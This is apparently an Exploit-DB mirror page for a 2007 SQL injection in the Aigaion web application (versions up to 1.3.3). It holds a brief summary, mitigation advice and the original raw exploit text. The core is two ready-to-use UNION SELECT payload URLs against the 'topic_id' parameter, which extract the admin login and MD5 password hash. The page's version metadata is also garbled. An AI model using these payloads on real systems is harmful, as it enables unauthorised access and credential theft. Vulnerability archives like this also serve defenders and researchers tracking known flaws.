header-logo
Suggest Exploit
vendor:
Aigaion
by:
Cody "CypherXero" Rester
N/A
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Aigaion
Affected Version From: 1.3.3 and below
Affected Version To: 1.3.2003
Patch Exists: NO
Related CWE: Not specified
CPE: Not specified
Metasploit:
Other Scripts:
Platforms Tested: Not specified
2007

Aigaion <= 1.3.3 SQL Injection Exploit

The Aigaion web application version 1.3.3 and below is vulnerable to SQL Injection. An attacker can exploit this vulnerability to obtain the admin username and MD5 hash. The exploit involves injecting malicious SQL code into the 'topic_id' parameter of the 'index.php?page=topic' URL. By manipulating the SQL query, the attacker can retrieve the admin login and password information.

Mitigation:

Upgrade Aigaion to a version higher than 1.3.3 that includes a fix for SQL Injection vulnerabilities. Alternatively, sanitize user input to prevent SQL Injection attacks.
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+                       Aigaion <= 1.3.3 SQL Injection Exploit                   +==--
--==+================================================================================+==--
DISCOVERED BY: Cody "CypherXero" Rester
PAYLOAD: Admin username and MD5 Hash
WEBSITE: http://www.cypherxero.net

Shoutouts to my friends darkfusion and magikgrl for being fucking awesome. w0rd.
--==+================================================================================+==--

EXPLOITS:

http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,CONCAT(login,CHAR(58),password),null/**/FROM/**/person/**/WHERE/**/ID=1--
http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,password,null/**/FROM/**/person--

# milw0rm.com [2007-07-09]